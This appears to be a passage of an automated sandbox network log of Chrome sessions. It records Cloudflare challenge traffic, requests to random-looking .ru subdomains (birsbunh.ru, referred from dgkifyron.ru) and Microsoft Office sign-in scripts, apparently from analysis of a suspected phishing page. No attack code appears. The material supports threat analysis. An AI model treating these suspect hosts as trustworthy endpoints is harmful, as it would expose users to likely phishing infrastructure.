AGa7jC8L1Fiv/Mdo2GlWXvwHcNdf9TdziNyb2G/upyevea+PNgyxZ2MVJb+mgdGEDfIrlBJBzfLdjIr7Hppw17nQa2T1KWUFH+Q/k9Vc1J [TRUNCATED]
                                                                                        2024-12-18 01:10:48 UTC233INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 35 46 61 59 47 73 5a 65 30 44 68 39 6e 72 2f 4a 30 66 72 36 48 78 34 46 38 68 4c 6f 50 48 57 75 55 43 72 38 6b 50 74 6d 74 35 42 6a 31 6c 4e 38 7a 4c 39 51 65 2f 72 35 39 44 6a 61 43 76 46 2f 4f 4e 72 63 4d 49 77 43 6c 2f 6b 71 75 33 34 52 4d 70 45 33 72 73 61 72 72 37 68 52 6a 75 5a 4a 61 50 74 2b 77 64 30 33 61 63 61 30 41 44 69 54 48 53 4d 71 6c 5a 34 3d 24 46 6b 33 71 44 6f 47 74 42 75 62 75 4b 78 6f 6c 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 33 62 34 36 37 38 65 61 38 63 66 37 38 64 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                        Data Ascii: cf-chl-out: 5FaYGsZe0Dh9nr/J0fr6Hx4F8hLoPHWuUCr8kPtmt5Bj1lN8zL9Qe/r59DjaCvF/ONrcMIwCl/kqu34RMpE3rsarr7hRjuZJaPt+wd03aca0ADiTHSMqlZ4=$Fk3qDoGtBubuKxolServer: cloudflareCF-RAY: 8f3b4678ea8cf78d-EWRalt-svc: h3=":443"; ma=86400
                                                                                        2024-12-18 01:10:48 UTC1249INData Raw: 6f 6e 37 45 77 4a 65 52 74 4a 69 55 70 4d 65 46 6d 64 43 52 77 72 4f 50 6e 36 47 30 74 61 4f 34 74 36 6d 2f 32 4a 62 53 33 62 6a 4e 73 61 57 69 77 65 6a 68 77 73 6a 72 70 4b 32 36 38 4c 48 6c 76 76 53 31 33 38 66 6e 39 4f 54 51 37 75 65 39 32 73 6e 38 7a 64 55 47 34 75 2f 56 43 66 77 45 31 65 59 49 78 65 6e 2b 30 65 7a 6c 42 68 45 4e 37 66 4d 5a 37 76 6f 4e 47 52 72 53 49 4e 6a 66 32 75 30 68 2b 50 76 62 46 79 6b 69 2f 65 44 38 4a 43 73 55 37 79 49 57 46 50 55 73 47 79 4d 6c 4f 42 51 38 4c 55 49 37 2b 42 64 46 51 68 55 45 53 51 6c 48 44 45 67 4d 52 44 30 4b 4d 77 56 54 53 44 59 78 4e 55 6f 71 52 46 59 61 52 6c 38 78 54 31 39 4c 57 6c 67 6a 57 7a 5a 58 55 6c 63 30 62 6b 4d 38 53 57 4e 70 55 53 31 55 4c 55 74 32 54 46 4a 52 4e 55 5a 4e 58 32 42 55 59 48 4a
                                                                                        Data Ascii: on7EwJeRtJiUpMeFmdCRwrOPn6G0taO4t6m/2JbS3bjNsaWiwejhwsjrpK268LHlvvS138fn9OTQ7ue92sn8zdUG4u/VCfwE1eYIxen+0ezlBhEN7fMZ7voNGRrSINjf2u0h+PvbFyki/eD8JCsU7yIWFPUsGyMlOBQ8LUI7+BdFQhUESQlHDEgMRD0KMwVTSDYxNUoqRFYaRl8xT19LWlgjWzZXUlc0bkM8SWNpUS1ULUt2TFJRNUZNX2BUYHJ
                                                                                        2024-12-18 01:10:48 UTC1369INData Raw: 6b 38 37 61 56 31 42 4e 6d 78 51 56 47 78 70 54 57 39 58 63 6d 70 64 62 56 68 55 59 56 74 53 63 6c 52 38 52 33 65 41 54 6c 6c 78 62 6f 6c 75 64 48 4a 33 54 6d 35 33 56 56 65 46 65 34 79 53 62 6e 70 68 58 6e 78 7a 6f 58 6d 47 68 33 61 66 68 57 61 6c 65 4a 69 4c 69 37 47 46 71 58 2b 6e 6d 5a 69 50 6d 4a 32 58 6c 6e 75 59 6a 37 6d 65 6e 61 46 2b 70 61 48 4b 69 62 4f 31 6d 59 71 72 71 61 75 6e 6f 72 79 7a 6c 5a 53 79 7a 4a 72 5a 75 4c 75 79 7a 73 43 62 76 39 69 31 73 2b 48 64 77 4b 44 4c 78 4c 33 48 77 37 76 5a 76 61 72 78 30 4b 79 2f 78 4e 6e 74 31 2f 66 59 79 38 76 50 36 64 7a 35 76 4e 72 4f 2f 4f 2f 6e 77 73 4c 69 39 50 33 6e 36 4f 6a 65 37 77 2f 79 43 74 34 48 38 4f 55 47 38 75 33 33 36 78 66 39 41 4e 37 72 39 51 44 79 46 67 63 49 2f 68 6f 59 2f 41 51 6f
                                                                                        Data Ascii: k87aV1BNmxQVGxpTW9XcmpdbVhUYVtSclR8R3eATllxboludHJ3Tm53VVeFe4ySbnphXnxzoXmGh3afhWaleJiLi7GFqX+nmZiPmJ2XlnuYj7menaF+paHKibO1mYqrqaunoryzlZSyzJrZuLuyzsCbv9i1s+HdwKDLxL3Hw7vZvarx0Ky/xNnt1/fYy8vP6dz5vNrO/O/nwsLi9P3n6Oje7w/yCt4H8OUG8u336xf9AN7r9QDyFgcI/hoY/AQo
                                                                                        2024-12-18 01:10:48 UTC1369INData Raw: 64 4b 56 45 4a 77 54 6c 31 35 55 7a 73 38 66 30 74 76 59 45 35 6b 58 32 4a 53 66 32 6c 48 5a 55 61 47 54 70 4a 75 68 59 75 4f 54 34 65 50 55 34 69 4e 66 6e 42 32 6b 6f 46 30 6e 70 61 68 6c 47 65 4a 71 57 4f 6a 5a 47 56 2b 6a 34 57 48 71 6d 79 6e 63 4a 64 30 70 49 71 50 64 61 71 4e 63 49 65 52 76 72 36 34 77 5a 71 50 73 35 6a 47 6b 73 71 6a 68 49 57 71 6b 4e 43 61 31 4b 75 4d 74 72 53 72 73 64 6a 63 71 5a 53 75 31 4b 6e 68 74 72 79 2f 72 65 53 66 75 70 2f 5a 73 37 79 31 79 75 2b 34 70 2b 44 72 78 65 62 67 38 4d 4c 54 32 75 6e 47 73 2b 6a 77 32 4e 6e 69 76 4e 67 44 76 4d 48 5a 30 76 6a 47 32 75 6a 76 34 39 6b 53 7a 64 76 71 34 4e 58 30 36 2b 51 46 35 4f 54 33 37 67 37 6f 49 65 72 78 39 2f 30 68 41 67 45 72 2f 67 49 41 48 77 73 6c 43 69 4d 68 2b 77 49 53 43
                                                                                        Data Ascii: dKVEJwTl15Uzs8f0tvYE5kX2JSf2lHZUaGTpJuhYuOT4ePU4iNfnB2koF0npahlGeJqWOjZGV+j4WHqmyncJd0pIqPdaqNcIeRvr64wZqPs5jGksqjhIWqkNCa1KuMtrSrsdjcqZSu1Knhtry/reSfup/Zs7y1yu+4p+Drxebg8MLT2unGs+jw2NnivNgDvMHZ0vjG2ujv49kSzdvq4NX06+QF5OT37g7oIerx9/0hAgEr/gIAHwslCiMh+wISC
                                                                                        2024-12-18 01:10:48 UTC485INData Raw: 47 57 6b 39 77 58 6e 6c 56 4f 30 56 6f 55 48 5a 34 65 57 42 6e 6a 46 78 62 66 6e 79 4f 59 58 42 75 5a 57 4a 78 6a 47 6c 6f 65 47 35 56 61 4a 4a 68 58 57 78 62 6d 32 4e 77 63 5a 79 62 65 36 32 6f 5a 6f 43 4a 72 58 32 4d 70 59 2b 4d 6a 49 4f 77 64 4a 4f 39 72 48 65 4a 72 35 61 63 6e 62 61 57 67 70 44 4b 6c 70 71 55 70 36 57 4c 67 71 75 61 79 36 69 68 6a 71 4b 6c 74 61 4f 6e 71 62 61 36 6d 72 57 59 73 70 6d 36 72 72 2b 31 77 62 54 5a 75 4d 48 73 74 37 33 49 79 73 50 41 7a 65 66 50 77 38 37 43 7a 38 66 4a 79 4c 37 49 32 4d 33 65 33 4e 48 4f 7a 73 4c 67 43 65 62 42 35 65 62 61 79 75 6e 71 34 75 33 73 38 64 37 53 35 4e 44 71 30 66 4c 6d 38 76 66 32 37 51 50 38 2f 66 41 52 41 51 44 67 2b 2f 55 6e 48 4f 41 50 35 77 55 7a 4a 4f 34 79 4f 41 37 76 2b 50 44 79 50 50
                                                                                        Data Ascii: GWk9wXnlVO0VoUHZ4eWBnjFxbfnyOYXBuZWJxjGloeG5VaJJhXWxbm2NwcZybe62oZoCJrX2MpY+MjIOwdJO9rHeJr5acnbaWgpDKlpqUp6WLgquay6ihjqKltaOnqba6mrWYspm6rr+1wbTZuMHst73IysPAzefPw87Cz8fJyL7I2M3e3NHOzsLgCebB5ebayunq4u3s8d7S5NDq0fLm8vf27QP8/fARAQDg+/UnHOAP5wUzJO4yOA7v+PDyPP


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        28192.168.2.1649748104.18.94.414436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:50 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/125857172:1734480993:OfdE6imy-GzCLV7tV1vzGVc07L0hYO19BOItnccvC5w/8f3b461238074211/ExOb.daxNHAiJT.h1RRGTEKuoCP8liHdCaZ3eIW.bag-1734484232-1.1.1.1-qNIWgYzRApq.Sk3W21WkBZVcC7C5o16q8dSHr6PvGPvTVg8.BgAUf19yvKbZUdM5 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:10:50 UTC379INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 18 Dec 2024 01:10:50 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 7
                                                                                        Connection: close
                                                                                        cf-chl-out: Aowl2kysZZ5ZTqU8O22RSeYyJcqj8e/sN4w=$YIUNDc9HALszeEao
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f3b46852bd14368-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-12-18 01:10:50 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                        Data Ascii: invalid


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        29192.168.2.1649752104.21.32.14436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:59 UTC666OUTGET /evkUpQeWjmUMAENOBwgNyesdolyYbjYBUfCMNKJEWIIGMENMXFFGRKPUKTIRPTWK HTTP/1.1
                                                                                        Host: gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ru
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Origin: https://dva.dgkifyron.ru
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://dva.dgkifyron.ru/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:11:00 UTC895INHTTP/1.1 200 OK
                                                                                        Date: Wed, 18 Dec 2024 01:11:00 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Access-Control-Allow-Origin: *
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uuXj67UZnWbA9jzPnFhn9nkYCS4ofXu7lDVK4CCJVd%2BE8oS6tCOmbMJjbVThlVE8NsAI9XIgYrEq85ihF29pxdvibaD6iu4gCUsBCvbnEEyNzVAqyBxeBESEP8T7dCIyfr8y8Z68Kkdfz0ujK0oFAr1eW0qyF58awfBtBkfmi36i0AusKIpXku5t3BHUW7IqdbkWm7KUUInAe%2Fk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f3b46c15c8241a6-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1617&rtt_var=858&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1244&delivery_rate=1805813&cwnd=239&unsent_bytes=0&cid=0c88b1bdedeee37a&ts=1137&x=0"
                                                                                        2024-12-18 01:11:00 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                        Data Ascii: 11
                                                                                        2024-12-18 01:11:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        30192.168.2.1649756104.21.32.14436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:11:03 UTC460OUTGET /evkUpQeWjmUMAENOBwgNyesdolyYbjYBUfCMNKJEWIIGMENMXFFGRKPUKTIRPTWK HTTP/1.1
                                                                                        Host: gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ru
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:11:04 UTC907INHTTP/1.1 200 OK
                                                                                        Date: Wed, 18 Dec 2024 01:11:04 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Access-Control-Allow-Origin: *
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZNO83Mp8W2xyqiGCd%2F5%2BHr2WBAIbDr4KVh2mcp%2B7RqoDs8nvViL57TAskaG%2Fvm02uOmMgUqK8IyeFu9xMHeYzzVVazYxr%2B9p9bAF%2FmNNjjzDK8TdwrGBv86q%2BRzeIObmi1kexQFfb53dx4sSHU5YAuzM92BmSdKizts9PgeTgcFFerss2RrO5UxlRbclGTffWHnY%2F2DMryUOXxU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f3b46d888fd8cda-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1833&min_rtt=1830&rtt_var=693&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1038&delivery_rate=1569892&cwnd=242&unsent_bytes=0&cid=e92de25f8d9dccad&ts=1015&x=0"
                                                                                        2024-12-18 01:11:04 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                        Data Ascii: 11
                                                                                        2024-12-18 01:11:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        31192.168.2.164977713.107.246.634436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:11:12 UTC551OUTGET /meversion?partner=office&market=en-us&uhf=1 HTTP/1.1
                                                                                        Host: mem.gfx.ms
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Referer: https://www.office.com/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:11:12 UTC617INHTTP/1.1 200 OK
                                                                                        Date: Wed, 18 Dec 2024 01:11:12 GMT
                                                                                        Content-Type: application/javascript
                                                                                        Content-Length: 30273
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, no-transform, max-age=43200
                                                                                        Expires: Wed, 18 Dec 2024 10:26:29 GMT
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, OPTIONS
                                                                                        X-UA-Compatible: IE=edge
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                        x-azure-ref: 20241218T011112Z-156796c549bv6fdshC1EWRsec80000000cwg000000003bsb
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-18 01:11:12 UTC15767INData Raw: 77 69 6e 64 6f 77 2e 4d 53 41 3d 77 69 6e 64 6f 77 2e 4d 53 41 7c 7c 7b 7d 3b 77 69 6e 64 6f 77 2e 4d 53 41 2e 4d 65 43 6f 6e 74 72 6f 6c 3d 77 69 6e 64 6f 77 2e 4d 53 41 2e 4d 65 43 6f 6e 74 72 6f 6c 7c 7c 7b 7d 3b 77 69 6e 64 6f 77 2e 4d 53 41 2e 4d 65 43 6f 6e 74 72 6f 6c 2e 43 6f 6e 66 69 67 3d 7b 22 76 65 72 22 3a 22 31 30 2e 32 34 32 32 38 2e 34 22 2c 22 6d 6b 74 22 3a 22 65 6e 2d 55 53 22 2c 22 70 74 6e 22 3a 22 6f 66 66 69 63 65 22 2c 22 67 66 78 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6d 63 64 6e 2e 6d 73 66 74 61 75 74 68 2e 6e 65 74 22 2c 22 64 62 67 22 3a 66 61 6c 73 65 2c 22 61 61 64 22 3a 74 72 75 65 2c 22 69 6e 74 22 3a 66 61 6c 73 65 2c 22 70 78 79 22 3a 74 72 75 65 2c 22 6d 73 54 78 74 22 3a 66 61 6c 73 65 2c 22 72 77 64 22 3a 74 72 75 65 2c
                                                                                        Data Ascii: window.MSA=window.MSA||{};window.MSA.MeControl=window.MSA.MeControl||{};window.MSA.MeControl.Config={"ver":"10.24228.4","mkt":"en-US","ptn":"office","gfx":"https://amcdn.msftauth.net","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd":true,
                                                                                        2024-12-18 01:11:12 UTC14506INData Raw: 5b 5d 2c 6e 29 3a 28 72 3d 6e 2c 74 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 47 65 2e 70 75 73 68 28 7b 69 64 3a 65 2c 64 65 70 73 3a 6e 2c 66 61 63 74 6f 72 79 3a 74 7d 29 7d 28 65 2c 72 2c 6f 29 7d 76 61 72 20 4b 65 3d 7b 22 40 6d 65 63 6f 6e 74 72 6f 6c 2f 77 65 62 2d 69 6e 6c 69 6e 65 22 3a 22 6d 65 49 6e 6c 69 6e 65 22 2c 22 40 6d 65 63 6f 6e 74 72 6f 6c 2f 77 65 62 2d 62 6f 6f 74 22 3a 22 6d 65 42 6f 6f 74 22 2c 22 40 6d 65 63 6f 6e 74 72 6f 6c 2f 77 65 62 2d 63 6f 72 65 22 3a 22 6d 65 43 6f 72 65 22 7d 2c 51 65 3d 77 69 6e 64 6f 77 2c 59 65 3d 28 76 6f 69 64 20 30 21 3d 3d 51 65 2e 74 72 75 73 74 65 64 54 79 70 65 73 26 26 76 6f 69 64 20 30 21 3d 3d 51 65 2e 74 72 75 73 74 65 64 54 79 70 65 73 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 3f
                                                                                        Data Ascii: [],n):(r=n,t),function(e,n,t){Ge.push({id:e,deps:n,factory:t})}(e,r,o)}var Ke={"@mecontrol/web-inline":"meInline","@mecontrol/web-boot":"meBoot","@mecontrol/web-core":"meCore"},Qe=window,Ye=(void 0!==Qe.trustedTypes&&void 0!==Qe.trustedTypes.createPolicy?


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        32192.168.2.164978613.107.246.634436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:11:14 UTC377OUTGET /meversion?partner=office&market=en-us&uhf=1 HTTP/1.1
                                                                                        Host: mem.gfx.ms
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:11:15 UTC617INHTTP/1.1 200 OK
                                                                                        Date: Wed, 18 Dec 2024 01:11:14 GMT
                                                                                        Content-Type: application/javascript
                                                                                        Content-Length: 30273
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, no-transform, max-age=43200
                                                                                        Expires: Wed, 18 Dec 2024 10:26:29 GMT
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, OPTIONS
                                                                                        X-UA-Compatible: IE=edge
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                        x-azure-ref: 20241218T011114Z-156796c549bpdgsjhC1EWR7zk00000000dk000000000985h
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-18 01:11:15 UTC15767INData Raw: 77 69 6e 64 6f 77 2e 4d 53 41 3d 77 69 6e 64 6f 77 2e 4d 53 41 7c 7c 7b 7d 3b 77 69 6e 64 6f 77 2e 4d 53 41 2e 4d 65 43 6f 6e 74 72 6f 6c 3d 77 69 6e 64 6f 77 2e 4d 53 41 2e 4d 65 43 6f 6e 74 72 6f 6c 7c 7c 7b 7d 3b 77 69 6e 64 6f 77 2e 4d 53 41 2e 4d 65 43 6f 6e 74 72 6f 6c 2e 43 6f 6e 66 69 67 3d 7b 22 76 65 72 22 3a 22 31 30 2e 32 34 32 32 38 2e 34 22 2c 22 6d 6b 74 22 3a 22 65 6e 2d 55 53 22 2c 22 70 74 6e 22 3a 22 6f 66 66 69 63 65 22 2c 22 67 66 78 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6d 63 64 6e 2e 6d 73 66 74 61 75 74 68 2e 6e 65 74 22 2c 22 64 62 67 22 3a 66 61 6c 73 65 2c 22 61 61 64 22 3a 74 72 75 65 2c 22 69 6e 74 22 3a 66 61 6c 73 65 2c 22 70 78 79 22 3a 74 72 75 65 2c 22 6d 73 54 78 74 22 3a 66 61 6c 73 65 2c 22 72 77 64 22 3a 74 72 75 65 2c
                                                                                        Data Ascii: window.MSA=window.MSA||{};window.MSA.MeControl=window.MSA.MeControl||{};window.MSA.MeControl.Config={"ver":"10.24228.4","mkt":"en-US","ptn":"office","gfx":"https://amcdn.msftauth.net","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd":true,
                                                                                        2024-12-18 01:11:15 UTC14506INData Raw: 5b 5d 2c 6e 29 3a 28 72 3d 6e 2c 74 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 47 65 2e 70 75 73 68 28 7b 69 64 3a 65 2c 64 65 70 73 3a 6e 2c 66 61 63 74 6f 72 79 3a 74 7d 29 7d 28 65 2c 72 2c 6f 29 7d 76 61 72 20 4b 65 3d 7b 22 40 6d 65 63 6f 6e 74 72 6f 6c 2f 77 65 62 2d 69 6e 6c 69 6e 65 22 3a 22 6d 65 49 6e 6c 69 6e 65 22 2c 22 40 6d 65 63 6f 6e 74 72 6f 6c 2f 77 65 62 2d 62 6f 6f 74 22 3a 22 6d 65 42 6f 6f 74 22 2c 22 40 6d 65 63 6f 6e 74 72 6f 6c 2f 77 65 62 2d 63 6f 72 65 22 3a 22 6d 65 43 6f 72 65 22 7d 2c 51 65 3d 77 69 6e 64 6f 77 2c 59 65 3d 28 76 6f 69 64 20 30 21 3d 3d 51 65 2e 74 72 75 73 74 65 64 54 79 70 65 73 26 26 76 6f 69 64 20 30 21 3d 3d 51 65 2e 74 72 75 73 74 65 64 54 79 70 65 73 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 3f
                                                                                        Data Ascii: [],n):(r=n,t),function(e,n,t){Ge.push({id:e,deps:n,factory:t})}(e,r,o)}var Ke={"@mecontrol/web-inline":"meInline","@mecontrol/web-boot":"meBoot","@mecontrol/web-core":"meCore"},Qe=window,Ye=(void 0!==Qe.trustedTypes&&void 0!==Qe.trustedTypes.createPolicy?


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        33192.168.2.164978713.107.246.634436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:11:14 UTC596OUTGET /scripts/c/ms.shared.analytics.mectrl-3.gbl.min.js HTTP/1.1
                                                                                        Host: js.monitor.azure.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        Origin: https://www.office.com
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Referer: https://www.office.com/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:11:15 UTC892INHTTP/1.1 200 OK
                                                                                        Date: Wed, 18 Dec 2024 01:11:14 GMT
                                                                                        Content-Type: text/javascript; charset=utf-8
                                                                                        Content-Length: 91802
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                        Last-Modified: Mon, 01 Jul 2024 17:02:58 GMT
                                                                                        ETag: 0x8DC99EFA85DE069
                                                                                        x-ms-request-id: fbe37448-a01e-0068-58b9-4b460a000000
                                                                                        x-ms-version: 2009-09-19
                                                                                        x-ms-meta-jssdkver: 3.2.18
                                                                                        x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.shared.analytics.mectrl-3.2.18.gbl.min.js
                                                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                        Access-Control-Allow-Origin: *
                                                                                        x-azure-ref: 20241218T011114Z-156796c549bjz2p8hC1EWRtp0g0000000dw0000000004xd1
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
